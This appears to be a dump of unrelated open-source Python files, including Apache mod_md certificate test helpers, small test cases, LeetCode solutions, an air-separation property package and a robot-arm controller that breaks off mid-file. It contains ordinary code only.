if r.exit_code != 0: log.error(f"curl get on {url} returned {r.exit_code}" f"\nstdout: {r.stdout}" f"\nstderr: {r.stderr}") assert r.exit_code == 0, r.stderr return r.json def get_certificate_status(self, domain) -> Dict: return self.get_json_content(domain, "/.httpd/certificate-status", insecure=True) def get_md_status(self, domain, via_domain=None, use_https=True, debug_log=False) -> Dict: if via_domain is None: via_domain = self._default_domain return self.get_json_content(via_domain, f"/md-status/{domain}", use_https=use_https, debug_log=debug_log) def get_server_status(self, query="/", via_domain=None, use_https=True): if via_domain is None: via_domain = self._default_domain return self.get_content(via_domain, "/server-status%s" % query, use_https=use_https) def await_completion(self, names, must_renew=False, restart=True, timeout=60, via_domain=None, use_https=True): try_until = time.time() + timeout renewals = {} names = names.copy() while len(names) > 0: if time.time() >= try_until: return False for name in names: mds = self.get_md_status(name, via_domain=via_domain, use_https=use_https) if mds is None: log.debug("not managed by md: %s" % name) return False if 'renewal' in mds: renewal = mds['renewal'] renewals[name] = True if 'finished' in renewal and renewal['finished'] is True: if (not must_renew) or (name in renewals): log.debug(f"domain cert was renewed: {name}") names.remove(name) if len(names) != 0: time.sleep(0.1) if restart: time.sleep(0.1) return self.apache_restart() == 0 return True def is_renewing(self, name): stat = self.get_certificate_status(name) return 'renewal' in stat def await_renewal(self, names, timeout=60): try_until = time.time() + timeout while len(names) > 0: if time.time() >= try_until: return False for name in names: md = self.get_md_status(name) if md is None: log.debug("not managed by md: %s" % name) return False if 'renewal' in md: names.remove(name) if len(names) != 0: time.sleep(0.1) return True def await_error(self, domain, timeout=60, via_domain=None, use_https=True, errors=1): try_until = time.time() + timeout while True: if time.time() >= try_until: return False md = self.get_md_status(domain, via_domain=via_domain, use_https=use_https) if md: if 'state' in md and md['state'] == MDTestEnv.MD_S_ERROR: return md if 'renewal' in md and 'errors' in md['renewal'] \ and md['renewal']['errors'] >= errors: return md time.sleep(0.1) return None def await_file(self, fpath, timeout=60): try_until = time.time() + timeout while True: if time.time() >= try_until: return False if os.path.isfile(fpath): return True time.sleep(0.1) def check_file_permissions(self, domain): md = self.a2md(["list", domain]).json['output'][0] assert md acct = md['ca']['account'] assert acct self.check_file_access(self.path_store_json(), 0o600) # domains self.check_file_access(self.store_domains(), 0o700) self.check_file_access(os.path.join(self.store_domains(), domain), 0o700) self.check_file_access(self.store_domain_file(domain, 'privkey.pem'), 0o600) self.check_file_access(self.store_domain_file(domain, 'pubcert.pem'), 0o600) self.check_file_access(self.store_domain_file(domain, 'md.json'), 0o600) # archive self.check_file_access(self.store_archived_file(domain, 1, 'md.json'), 0o600) # accounts self.check_file_access(os.path.join(self._store_dir, 'accounts'), 0o755) self.check_file_access(os.path.join(self._store_dir, 'accounts', acct), 0o755) self.check_file_access(self.path_account(acct), 0o644) self.check_file_access(self.path_account_key(acct), 0o644) # staging self.check_file_access(self.store_stagings(), 0o755) def get_ocsp_status(self, domain, proto=None, cipher=None, ca_file=None): stat = {} args = [ "openssl", "s_client", "-status", "-connect", "%s:%s" % (self._httpd_addr, self.https_port), "-CAfile", ca_file if ca_file else self.acme_ca_pemfile, "-servername", domain, "-showcerts" ] if proto is not None: args.extend(["-{0}".format(proto)]) if cipher is not None: args.extend(["-cipher", cipher]) r = self.run(args, debug_log=False) ocsp_regex = re.compile(r'OCSP response: +([^=\n]+)\n') matches = ocsp_regex.finditer(r.stdout) for m in matches: if m.group(1) != "": stat['ocsp'] = m.group(1) if 'ocsp' not in stat: ocsp_regex = re.compile(r'OCSP Response Status:\s*(.+)') matches = ocsp_regex.finditer(r.stdout) for m in matches: if m.group(1) != "": stat['ocsp'] = m.group(1) verify_regex = re.compile(r'Verify return code:\s*(.+)') matches = verify_regex.finditer(r.stdout) for m in matches: if m.group(1) != "": stat['verify'] = m.group(1) return stat def await_ocsp_status(self, domain, timeout=10, ca_file=None): try_until = time.time() + timeout while True: if time.time() >= try_until: break stat = self.get_ocsp_status(domain, ca_file=ca_file) if 'ocsp' in stat and stat['ocsp'] != "no response sent": return stat time.sleep(0.1) raise TimeoutError(f"ocsp respopnse not available: {domain}") def create_self_signed_cert(self, name_list, valid_days, serial=1000, path=None): dirpath = path if not path: dirpath = os.path.join(self.store_domains(), name_list[0]) return MDCertUtil.create_self_signed_cert(dirpath, name_list, valid_days, serial)
tests/performance/bottle/simple_server.py
Varriount/sanic
4,959
8817
# Run with: gunicorn --workers=1 --worker-class=meinheld.gmeinheld.MeinheldWorker -b :8000 simple_server:app import bottle import ujson from bottle import route, run @route("/") def index(): return ujson.dumps({"test": True}) app = bottle.default_app()
sdk/python/lib/test/langhost/future_input/__main__.py
pcen/pulumi
12,004
8827
# Copyright 2016-2018, Pulumi Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from pulumi import CustomResource, Output, Input async def read_a_file_or_something(): await asyncio.sleep(0) return "here's a file" def assert_eq(l, r): assert l == r class FileResource(CustomResource): contents: Output[str] def __init__(self, name: str, file_contents: Input[str]) -> None: CustomResource.__init__(self, "test:index:FileResource", name, { "contents": file_contents }) # read_a_file_or_something returns a coroutine when called, which needs to be scheduled # and awaited in order to yield a value. file_res = FileResource("file", read_a_file_or_something()) file_res.contents.apply(lambda c: assert_eq(c, "here's a file"))
AppPkg/Applications/Python/Python-2.7.2/Lib/lib2to3/fixes/fix_methodattrs.py
CEOALT1/RefindPlusUDK
2,757
8833
<reponame>CEOALT1/RefindPlusUDK<gh_stars>1000+ """Fix bound method attributes (method.im_? -> method.__?__). """ # Author: <NAME> # Local imports from .. import fixer_base from ..fixer_util import Name MAP = { "im_func" : "__func__", "im_self" : "__self__", "im_class" : "__self__.__class__" } class FixMethodattrs(fixer_base.BaseFix): BM_compatible = True PATTERN = """ power< any+ trailer< '.' attr=('im_func' | 'im_self' | 'im_class') > any* > """ def transform(self, node, results): attr = results["attr"][0] new = unicode(MAP[attr.value]) attr.replace(Name(new, prefix=attr.prefix))
tests/test_misc.py
lordmauve/chopsticks
171
8839
"""Tests for miscellaneous properties, such as debuggability.""" import time from chopsticks.tunnel import Docker from chopsticks.group import Group def test_tunnel_repr(): """Tunnels have a usable repr.""" tun = Docker('py36', image='python:3.6') assert repr(tun) == "Docker('py36')" def test_group_repr(): """Groups have a usable repr.""" grp = Group([ Docker('py35', image='python:3.5'), Docker('py36', image='python:3.6') ]) assert repr(grp) == "Group([Docker('py35'), Docker('py36')])" def test_group_reuse(): """We can re-use a group.""" grp = Group([ Docker('py35', image='python:3.5'), Docker('py36', image='python:3.6') ]) with grp: grp.call(time.time) grp.call(time.time)
intro/matplotlib/examples/plot_good.py
zmoon/scipy-lecture-notes
2,538
8883
""" A simple, good-looking plot =========================== Demoing some simple features of matplotlib """ import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt fig = plt.figure(figsize=(5, 4), dpi=72) axes = fig.add_axes([0.01, 0.01, .98, 0.98]) X = np.linspace(0, 2, 200) Y = np.sin(2*np.pi*X) plt.plot(X, Y, lw=2) plt.ylim(-1.1, 1.1) plt.grid() plt.show()
src/backend/common/models/favorite.py
ofekashery/the-blue-alliance
266
8901
from backend.common.models.mytba import MyTBAModel class Favorite(MyTBAModel): """ In order to make strongly consistent DB requests, instances of this class should be created with a parent that is the associated Account key. """ def __init__(self, *args, **kwargs): super(Favorite, self).__init__(*args, **kwargs)
modules/pygsm/devicewrapper.py
whanderley/eden
205
8903
<gh_stars>100-1000 #!/usr/bin/env python # vim: ai ts=4 sts=4 et sw=4 encoding=utf-8 # arch: pacman -S python-pyserial # debian/ubuntu: apt-get install python-serial import serial import re import errors class DeviceWrapper(object): def __init__(self, logger, *args, **kwargs): self.device = serial.Serial(*args, **kwargs) self.logger = logger def isOpen(self): return self.device.isOpen() def close(self): self.device.close() def write(self, str): self.device.write(str) def _read(self, read_term=None, read_timeout=None): """Read from the modem (blocking) until _terminator_ is hit, (defaults to \r\n, which reads a single "line"), and return.""" buffer = [] # if a different timeout was requested just # for _this_ read, store and override the # current device setting (not thread safe!) if read_timeout is not None: old_timeout = self.device.timeout self.device.timeout = read_timeout def __reset_timeout(): """restore the device's previous timeout setting, if we overrode it earlier.""" if read_timeout is not None: self.device.timeout =\ old_timeout # the default terminator reads # until a newline is hit if read_term is None: read_term = "\r\n" while(True): buf = self.device.read() buffer.append(buf) # if a timeout was hit, raise an exception including the raw data that # we've already read (in case the calling func was _expecting_ a timeout # (wouldn't it be nice if serial.Serial.read returned None for this?) if buf == '': __reset_timeout() raise(errors.GsmReadTimeoutError(buffer)) # if last n characters of the buffer match the read # terminator, return what we've received so far if ''.join(buffer[-len(read_term):]) == read_term: buf_str = ''.join(buffer) __reset_timeout() self._log(repr(buf_str), 'read') return buf_str def read_lines(self, read_term=None, read_timeout=None): """Read from the modem (blocking) one line at a time until a response terminator ("OK", "ERROR", or "CMx ERROR...") is hit, then return a list containing the lines.""" buffer = [] # keep on looping until a command terminator # is encountered. these are NOT the same as the # "read_term" argument - only OK or ERROR is valid while(True): buf = self._read( read_term=read_term, read_timeout=read_timeout) buf = buf.strip() buffer.append(buf) # most commands return OK for success, but there # are some exceptions. we're not checking those # here (unlike RubyGSM), because they should be # handled when they're _expected_ if buf == "OK": return buffer # some errors contain useful error codes, so raise a # proper error with a description from pygsm/errors.py m = re.match(r"^\+(CM[ES]) ERROR: (\d+)$", buf) if m is not None: type, code = m.groups() raise(errors.GsmModemError(type, int(code))) # ...some errors are not so useful # (at+cmee=1 should enable error codes) if buf == "ERROR": raise(errors.GsmModemError) def _log(self, str, type="debug"): if hasattr(self, "logger"): self.logger(self, str, type)
tests/cases/cls.py
div72/py2many
345
8907
<gh_stars>100-1000 class Foo: def bar(self): return "a" if __name__ == "__main__": f = Foo() b = f.bar() print(b)
idaes/generic_models/properties/core/examples/ASU_PR.py
carldlaird/idaes-pse
112
8911
<filename>idaes/generic_models/properties/core/examples/ASU_PR.py ################################################################################# # The Institute for the Design of Advanced Energy Systems Integrated Platform # Framework (IDAES IP) was produced under the DOE Institute for the # Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021 # by the software owners: The Regents of the University of California, through # Lawrence Berkeley National Laboratory, National Technology & Engineering # Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University # Research Corporation, et al. All rights reserved. # # Please see the files COPYRIGHT.md and LICENSE.md for full copyright and # license information. ################################################################################# """ Air separation phase equilibrium package using Peng-Robinson EoS. Example property package using the Generic Property Package Framework. This example shows how to set up a property package to do air separation phase equilibrium in the generic framework using Peng-Robinson equation along with methods drawn from the pre-built IDAES property libraries. The example includes two dictionaries. 1. The dictionary named configuration contains parameters obtained from The Properties of Gases and Liquids (1987) 4th edition and NIST. 2. The dictionary named configuration_Dowling_2015 contains parameters used in A framework for efficient large scale equation-oriented flowsheet optimization (2015) Dowling. The parameters are extracted from Properties of Gases and Liquids (1977) 3rd edition for Antoine's vapor equation and acentric factors and converted values from the Properties of Gases and Liquids (1977) 3rd edition to j. """ # Import Python libraries import logging # Import Pyomo units from pyomo.environ import units as pyunits # Import IDAES cores from idaes.core import LiquidPhase, VaporPhase, Component from idaes.generic_models.properties.core.state_definitions import FTPx from idaes.generic_models.properties.core.eos.ceos import Cubic, CubicType from idaes.generic_models.properties.core.phase_equil import SmoothVLE from idaes.generic_models.properties.core.phase_equil.bubble_dew import \ LogBubbleDew from idaes.generic_models.properties.core.phase_equil.forms import log_fugacity from idaes.generic_models.properties.core.pure import RPP4 from idaes.generic_models.properties.core.pure import NIST from idaes.generic_models.properties.core.pure import RPP3 # Set up logger _log = logging.getLogger(__name__) # --------------------------------------------------------------------- # Configuration dictionary for a Peng-Robinson Oxygen-Argon-Nitrogen system # Data Sources: # [1] The Properties of Gases and Liquids (1987) # 4th edition, Chemical Engineering Series - <NAME> # [2] NIST, https://webbook.nist.gov/ # Retrieved 16th August, 2020 # [3] The Properties of Gases and Liquids (1987) # 3rd edition, Chemical Engineering Series - <NAME> # Cp parameters where converted to j in Dowling 2015 # [4] A framework for efficient large scale equation-oriented flowsheet optimization (2015) # Computers and Chemical Engineering - <NAME> configuration = { # Specifying components "components": { "nitrogen": {"type": Component, "enth_mol_ig_comp": RPP4, "entr_mol_ig_comp": RPP4, "pressure_sat_comp": NIST, "phase_equilibrium_form": {("Vap", "Liq"): log_fugacity}, "parameter_data": { "mw": (28.0135E-3, pyunits.kg/pyunits.mol), # [1] "pressure_crit": (34e5, pyunits.Pa), # [1] "temperature_crit": (126.2, pyunits.K), # [1] "omega": 0.037, # [1] "cp_mol_ig_comp_coeff": { "A": (3.115E1, pyunits.J/pyunits.mol/pyunits.K), # [1] "B": (-1.357E-2, pyunits.J/pyunits.mol/pyunits.K**2), "C": (2.680E-5, pyunits.J/pyunits.mol/pyunits.K**3), "D": (-1.168E-8, pyunits.J/pyunits.mol/pyunits.K**4)}, "enth_mol_form_vap_comp_ref": ( 0.0, pyunits.J/pyunits.mol), # [2] "entr_mol_form_vap_comp_ref": ( 191.61, pyunits.J/pyunits.mol/pyunits.K), # [2] "pressure_sat_comp_coeff": { "A": (3.7362, None), # [2] "B": (264.651, pyunits.K), "C": (-6.788, pyunits.K)}}}, "argon": {"type": Component, "enth_mol_ig_comp": RPP4, "entr_mol_ig_comp": RPP4, "pressure_sat_comp": NIST, "phase_equilibrium_form": {("Vap", "Liq"): log_fugacity}, "parameter_data": { "mw": (39.948E-3, pyunits.kg/pyunits.mol), # [1] "pressure_crit": (48.98e5, pyunits.Pa), # [1] "temperature_crit": (150.86, pyunits.K), # [1] "omega": 0.001, # [1] "cp_mol_ig_comp_coeff": { "A": (2.050E1, pyunits.J/pyunits.mol/pyunits.K), # [1] "B": (0.0, pyunits.J/pyunits.mol/pyunits.K**2), "C": (0.0, pyunits.J/pyunits.mol/pyunits.K**3), "D": (0.0, pyunits.J/pyunits.mol/pyunits.K**4)}, "enth_mol_form_vap_comp_ref": ( 0.0, pyunits.J/pyunits.mol), # [2] "entr_mol_form_vap_comp_ref": ( 154.8, pyunits.J/pyunits.mol/pyunits.K), # [2] "pressure_sat_comp_coeff": {"A": (3.29555, None), # [2] "B": (215.24, pyunits.K), "C": (-22.233, pyunits.K)}}}, "oxygen": {"type": Component, "enth_mol_ig_comp": RPP4, "entr_mol_ig_comp": RPP4, "pressure_sat_comp": NIST, "phase_equilibrium_form": {("Vap", "Liq"): log_fugacity}, "parameter_data": { "mw": (31.999E-3, pyunits.kg/pyunits.mol), # [1] "pressure_crit": (50.43e5, pyunits.Pa), # [1] "temperature_crit": (154.58, pyunits.K), # [1] "omega": 0.025, # [1] "cp_mol_ig_comp_coeff": { "A": (2.811E1, pyunits.J/pyunits.mol/pyunits.K), "B": (-3.680E-6, pyunits.J/pyunits.mol/pyunits.K**2), "C": (1.746E-5, pyunits.J/pyunits.mol/pyunits.K**3), "D": (-1.065E-8, pyunits.J/pyunits.mol/pyunits.K**4)}, "enth_mol_form_vap_comp_ref": ( 0.0, pyunits.J/pyunits.mol), # [2] "entr_mol_form_vap_comp_ref": ( 205.152, pyunits.J/pyunits.mol/pyunits.K), # [2] "pressure_sat_comp_coeff": { "A": (3.85845, None), # [2] "B": (325.675, pyunits.K), "C": (-5.667, pyunits.K)}}}}, # Specifying phases "phases": {"Liq": {"type": LiquidPhase, "equation_of_state": Cubic, "equation_of_state_options": { "type": CubicType.PR}}, "Vap": {"type": VaporPhase, "equation_of_state": Cubic, "equation_of_state_options": { "type": CubicType.PR}}}, # Set base units of measurement "base_units": {"time": pyunits.s, "length": pyunits.m, "mass": pyunits.kg, "amount": pyunits.mol, "temperature": pyunits.K}, # Specifying state definition "state_definition": FTPx, "state_bounds": {"flow_mol": (0, 100, 1000, pyunits.mol/pyunits.s), "temperature": (10, 300, 350, pyunits.K), "pressure": (5e4, 1e5, 1e7, pyunits.Pa)}, "pressure_ref": (101325, pyunits.Pa), "temperature_ref": (298.15, pyunits.K), # Defining phase equilibria "phases_in_equilibrium": [("Vap", "Liq")], "phase_equilibrium_state": {("Vap", "Liq"): SmoothVLE}, "bubble_dew_method": LogBubbleDew, "parameter_data": {"PR_kappa": {("nitrogen", "nitrogen"): 0.000, ("nitrogen", "argon"): -0.26e-2, ("nitrogen", "oxygen"): -0.119e-1, ("argon", "nitrogen"): -0.26e-2, ("argon", "argon"): 0.000, ("argon", "oxygen"): 0.104e-1, ("oxygen", "nitrogen"): -0.119e-1, ("oxygen", "argon"): 0.104e-1, ("oxygen", "oxygen"): 0.000}}} configuration_Dowling_2015 = { # Specifying components "components": { "nitrogen": {"type": Component, "enth_mol_ig_comp": RPP4, "entr_mol_ig_comp": RPP4, "pressure_sat_comp": RPP3, "phase_equilibrium_form": {("Vap", "Liq"): log_fugacity}, "parameter_data": { "mw": (28.0135E-3, pyunits.kg/pyunits.mol), # [3] "pressure_crit": (33.943875e5, pyunits.Pa), # [4] "temperature_crit": (126.2, pyunits.K), # [4] "omega": 0.04, # [3] "cp_mol_ig_comp_coeff": { 'A': (3.112896E1, pyunits.J/pyunits.mol/pyunits.K), # [3] 'B': (-1.356E-2, pyunits.J/pyunits.mol/pyunits.K**2), 'C': (2.6878E-5, pyunits.J/pyunits.mol/pyunits.K**3), 'D': (-1.167E-8, pyunits.J/pyunits.mol/pyunits.K**4)}, "enth_mol_form_vap_comp_ref": ( 0.0, pyunits.J/pyunits.mol), # [2] "entr_mol_form_vap_comp_ref": ( 191.61, pyunits.J/pyunits.mol/pyunits.K), # [2] "pressure_sat_comp_coeff": { 'A': (14.9342, None), # [3] 'B': (588.72, pyunits.K), 'C': (-6.60, pyunits.K)}}}, "argon": {"type": Component, "enth_mol_ig_comp": RPP4, "entr_mol_ig_comp": RPP4, "pressure_sat_comp": RPP3, "phase_equilibrium_form": {("Vap", "Liq"): log_fugacity}, "parameter_data": { "mw": (39.948E-3, pyunits.kg/pyunits.mol), # [3] "pressure_crit": (48.737325e5, pyunits.Pa), # [4] "temperature_crit": (150.86, pyunits.K), # [4] "omega": -0.004, # [1] "cp_mol_ig_comp_coeff": { 'A': (2.0790296E1, pyunits.J/pyunits.mol/pyunits.K), # [3] 'B': (-3.209E-05, pyunits.J/pyunits.mol/pyunits.K**2), 'C': (5.163E-08, pyunits.J/pyunits.mol/pyunits.K**3), 'D': (0.0, pyunits.J/pyunits.mol/pyunits.K**4)}, "enth_mol_form_vap_comp_ref": ( 0.0, pyunits.J/pyunits.mol), # [3] "entr_mol_form_vap_comp_ref": ( 154.8, pyunits.J/pyunits.mol/pyunits.K), # [3] "pressure_sat_comp_coeff": { 'A': (15.2330, None), # [3] 'B': (700.51, pyunits.K), 'C': (-5.84, pyunits.K)}}}, "oxygen": {"type": Component, "enth_mol_ig_comp": RPP4, "entr_mol_ig_comp": RPP4, "pressure_sat_comp": RPP3, "phase_equilibrium_form": {("Vap", "Liq"): log_fugacity}, "parameter_data": { "mw": (31.999E-3, pyunits.kg/pyunits.mol), # [3] "pressure_crit": (50.45985e5, pyunits.Pa), # [4] "temperature_crit": (154.58, pyunits.K), # [4] "omega": 0.021, # [1] "cp_mol_ig_comp_coeff": { 'A': (2.8087192E1, pyunits.J/pyunits.mol/pyunits.K), # [3] 'B': (-3.678E-6, pyunits.J/pyunits.mol/pyunits.K**2), 'C': (1.745E-5, pyunits.J/pyunits.mol/pyunits.K**3), 'D': (-1.064E-8, pyunits.J/pyunits.mol/pyunits.K**4)}, "enth_mol_form_vap_comp_ref": ( 0.0, pyunits.J/pyunits.mol), # [2] "entr_mol_form_vap_comp_ref": ( 205.152, pyunits.J/pyunits.mol/pyunits.K), # [2] "pressure_sat_comp_coeff": { 'A': (15.4075, None), # [3] 'B': (734.55, pyunits.K), 'C': (-6.45, pyunits.K)}}}}, # Specifying phases "phases": {"Liq": {"type": LiquidPhase, "equation_of_state": Cubic, "equation_of_state_options": { "type": CubicType.PR}}, "Vap": {"type": VaporPhase, "equation_of_state": Cubic, "equation_of_state_options": { "type": CubicType.PR}}}, # Set base units of measurement "base_units": {"time": pyunits.s, "length": pyunits.m, "mass": pyunits.kg, "amount": pyunits.mol, "temperature": pyunits.K}, # Specifying state definition "state_definition": FTPx, "state_bounds": {"flow_mol": (0, 100, 1000, pyunits.mol/pyunits.s), "temperature": (10, 300, 350, pyunits.K), "pressure": (5e4, 1e5, 1e7, pyunits.Pa)}, "pressure_ref": (101325, pyunits.Pa), "temperature_ref": (298.15, pyunits.K), # Defining phase equilibria "phases_in_equilibrium": [("Vap", "Liq")], "phase_equilibrium_state": {("Vap", "Liq"): SmoothVLE}, "bubble_dew_method": LogBubbleDew, "parameter_data": {"PR_kappa": {("nitrogen", "nitrogen"): 0.000, ("nitrogen", "argon"): -0.26e-2, ("nitrogen", "oxygen"): -0.119e-1, ("argon", "nitrogen"): -0.26e-2, ("argon", "argon"): 0.000, ("argon", "oxygen"): 0.104e-1, ("oxygen", "nitrogen"): -0.119e-1, ("oxygen", "argon"): 0.104e-1, ("oxygen", "oxygen"): 0.000}}}
Python/longest-valid-parentheses.py
shreyventure/LeetCode-Solutions
388
8914
''' Speed: 95.97% Memory: 24.96% Time complexity: O(n) Space complexity: O(n) ''' class Solution(object): def longestValidParentheses(self, s): ans=0 stack=[-1] for i in range(len(s)): if(s[i]=='('): stack.append(i) else: stack.pop() if(len(stack)==0): stack.append(i) else: ans=max(ans,i-stack[-1]) return ans
distdeepq/__init__.py
Silvicek/distributional-dqn
131
8957
from distdeepq import models # noqa from distdeepq.build_graph import build_act, build_train # noqa from distdeepq.simple import learn, load, make_session # noqa from distdeepq.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer # noqa from distdeepq.static import * from distdeepq.plots import PlotMachine
LeetCode/python3/287.py
ZintrulCre/LeetCode_Archiver
279
9012
class Solution: def findDuplicate(self, nums: List[int]) -> int: p1, p2 = nums[0], nums[nums[0]] while nums[p1] != nums[p2]: p1 = nums[p1] p2 = nums[nums[p2]] p2 = 0 while nums[p1] != nums[p2]: p1 = nums[p1] p2 = nums[p2] return nums[p1]
src/twisted/test/myrebuilder1.py
mathieui/twisted
9,953
9013
<reponame>mathieui/twisted<filename>src/twisted/test/myrebuilder1.py class A: def a(self): return 'a' class B(A, object): def b(self): return 'b' class Inherit(A): def a(self): return 'c'
modules/google-earth-engine/docker/src/sepalinternal/gee.py
BuddyVolly/sepal
153
9015
import json from threading import Semaphore import ee from flask import request from google.auth import crypt from google.oauth2 import service_account from google.oauth2.credentials import Credentials service_account_credentials = None import logging export_semaphore = Semaphore(5) get_info_semaphore = Semaphore(2) def init_service_account_credentials(args): global service_account_credentials with open(args['gee_key_path'], 'r') as file_: key_data = file_.read() signer = crypt.RSASigner.from_string(key_data) service_account_credentials = service_account.Credentials( signer=signer, service_account_email=args['gee_email'], token_uri=ee.oauth.TOKEN_URI, scopes=ee.oauth.SCOPES + ['https://www.googleapis.com/auth/drive'] ) def init_ee(): credentials = service_account_credentials if 'sepal-user' in request.headers: user = json.loads(request.headers['sepal-user']) googleTokens = user.get('googleTokens', None) if googleTokens: credentials = Credentials(googleTokens['accessToken']) ee.InitializeThread(credentials) def to_asset_id(asset_path): asset_roots = ee.data.getAssetRoots() if not asset_roots: raise Exception('User has no GEE asset roots') return asset_roots[0]['id'] + '/' + asset_path def delete_asset_collection(asset_id): logging.info('Recursively deleting ' + asset_id) if ee.data.getInfo(asset_id): images = ee.data.getList({ 'id': asset_id, 'fields': 'id' }) for image in images: ee.data.deleteAsset(image['id']) logging.info('Deleted ' + image['id']) ee.data.deleteAsset(asset_id) logging.info('Deleted ' + asset_id) def create_asset_image_collection(asset_id): delete_asset_collection(asset_id) ee.data.create_assets( asset_ids=[asset_id], asset_type=ee.data.ASSET_TYPE_IMAGE_COLL, mk_parents=True ) def create_asset_folder(asset_id): ee.data.create_assets( asset_ids=[asset_id], asset_type=ee.data.ASSET_TYPE_FOLDER, mk_parents=True ) def get_info(ee_object): try: get_info_semaphore.acquire() return ee_object.getInfo() finally: get_info_semaphore.release()
PyIK/src/litearm.py
AliShug/EvoArm
110
9018
<reponame>AliShug/EvoArm from __future__ import print_function import numpy as np import struct import solvers import pid from util import * MOTORSPEED = 0.9 MOTORMARGIN = 1 MOTORSLOPE = 30 ERRORLIM = 5.0 class ArmConfig: """Holds an arm's proportions, limits and other configuration data""" def __init__(self, main_length = 148.4, forearm_length = 160, linkage_length = 155, lower_actuator_length = 65, upper_actuator_length = 54.4, wrist_length = 90.52, shoulder_offset = [-9.7, 18.71]): self.main_length = main_length self.forearm_length = forearm_length self.linkage_length = linkage_length self.lower_actuator_length = lower_actuator_length self.upper_actuator_length = upper_actuator_length self.wrist_length = wrist_length; self.shoulder_offset = shoulder_offset class ArmPose: """ Defines a physical configuration of a LiteArm robot arm. Internal angles are relative to vertical (elevator/actuator) or straight forward (swing), and are stored in radians. Extracted servo angles range 0-300 and are measured in degrees. Provides methods for: - finding the required servo angles to reach the pose - checking the validity of the pose """ structFormat = 'fffff' @staticmethod def calcElevatorAngle(servoAngle): return radians(178.21 - servoAngle) @staticmethod def calcSwingAngle(servoAngle): return radians(150.0 - servoAngle) @staticmethod def calcActuatorAngle(servoAngle): return radians(servoAngle - 204.78) @staticmethod def calcWristXAngle(servoAngle): return radians(150.0 - servoAngle) @staticmethod def calcWristYAngle(servoAngle): return radians(servoAngle - 147.0) def __init__(self, arm_config, swing_angle, shoulder_angle, actuator_angle, elbow_angle, elbow2D, wrist2D, effector2D, effector, wrist_x, wrist_y): self.cfg = arm_config self.swing_angle = swing_angle self.shoulder_angle = shoulder_angle self.actuator_angle = actuator_angle self.elbow_angle = elbow_angle # Joints in the arm shoulder = rotate(self.cfg.shoulder_offset, swing_angle) self.shoulder2D = [self.cfg.shoulder_offset[1], 0] self.shoulder = [shoulder[0], 0, shoulder[1]] self.wrist2D = wrist2D self.effector2D = effector2D self.effector = effector # Construct the 3D elbow & wrist positions from the 2D (planar) IK # solution arm_vec = effector - self.shoulder arm_vec[1] = 0 self.elbow2D = elbow2D self.elbow = self.shoulder + normalize(arm_vec)*elbow2D[0] self.elbow[1] = elbow2D[1] self.wrist = self.effector - normalize(arm_vec)*arm_config.wrist_length # Wrist pose self.wristXAngle = wrist_x self.wristYAngle = wrist_y def getServoElevator(self): return 178.21 - degrees(self.shoulder_angle) def getServoActuator(self): return degrees(self.actuator_angle) + 204.78 def getServoSwing(self): return 150 - degrees(self.swing_angle) def getServoWristX(self): return 150 - degrees(self.wristXAngle) def getServoWristY(self): return 147 + degrees(self.wristYAngle) def armDiffAngle(self): return degrees(self.shoulder_angle - self.actuator_angle) def checkActuator(self): angle = self.getServoActuator() return angle >= 95 and angle <= 250 def checkDiff(self): angle = self.armDiffAngle() return angle >= 44 and angle <= 175 def checkElevator(self): angle = self.getServoElevator() return angle >= 60 and angle <= 210 def checkForearm(self): angle = degrees(self.elbow_angle + self.shoulder_angle) return angle < 200 and angle > 80 def checkSwing(self): angle = self.getServoSwing() return angle >= 60 and angle <= 240 def checkWristX(self): angle = self.getServoWristX() return angle >= 60 and angle <= 240 def checkWristY(self): angle = self.getServoWristY() return angle >= 60 and angle <= 160 def checkPositioning(self): # When Y>0 Forearm always faces outwards if self.wrist2D[1] > 0 and self.wrist2D[0] < self.elbow2D[0]: return False # No valid positions X<=0 if self.wrist2D[0] <= 0: return False # Effector height range if self.effector[1] > 180 or self.effector[1] < -200: return False return True def checkClearance(self): return (self.checkDiff() and self.checkActuator() and self.checkElevator() and self.checkSwing() and self.checkWristX() and self.checkWristY() and self.checkPositioning() and self.checkForearm()) def serialize(self): """Returns a packed struct holding the pose information""" return struct.pack( ArmPose.structFormat, self.swing_angle, self.shoulder_angle, self.elbow_angle, self.wristXAngle, self.wristYAngle ) class ArmController: def __init__(self, servo_swing, servo_shoulder, servo_elbow, servo_wrist_x, servo_wrist_y, arm_config, motion_enable = False): # Solvers are responsible for calculating the target servo positions to # reach a given goal position self.ik = solvers.IKSolver( arm_config.main_length, arm_config.forearm_length, arm_config.wrist_length, arm_config.shoulder_offset) self.physsolver = solvers.PhysicalSolver( arm_config.main_length, arm_config.linkage_length, arm_config.lower_actuator_length, arm_config.upper_actuator_length) # Servos self.servos = {} self.servos["swing"] = servo_swing self.servos["shoulder"] = servo_shoulder self.servos["elbow"] = servo_elbow self.servos["wrist_x"] = servo_wrist_x self.servos["wrist_y"] = servo_wrist_y for key, servo in self.servos.iteritems(): if servo is None: print ("Warning: {0} servo not connected".format(key)) else: # Initialise a PID controller for the servo if servo.protocol == 1: servo.setGoalSpeed(-MOTORSPEED) servo.data['pid'] = pid.PIDControl(2.4, 0, 0.4) else: servo.setGoalSpeed(0) servo.data['error'] = 0.0 # Make sure the goal speed is set servo.setTorqueEnable(1) if servo.protocol == 1: print("Setting slope") servo.setCWMargin(MOTORMARGIN) servo.setCCWMargin(MOTORMARGIN) servo.setCWSlope(MOTORSLOPE) servo.setCCWSlope(MOTORSLOPE) # Store parameters self.motion_enable = True self.enableMovement(False) self.cfg = arm_config # Dirty flags for stored poses self.ik_pose = None self.ik_dirty = True self.real_pose = None self.real_dirty = True # Current target pose self.target_pose = None def enableMovement(self, enable): changed = False if enable and not self.motion_enable: print ("Warning: Arm enabled") self.motion_enable = True changed = True elif not enable: self.motion_enable = False changed = True if changed: # Set servos on/off if self.servos['swing'] is not None: self.servos['swing'].setTorqueEnable(self.motion_enable) if self.servos['shoulder'] is not None: self.servos['shoulder'].setTorqueEnable(self.motion_enable) if self.servos['elbow'] is not None: 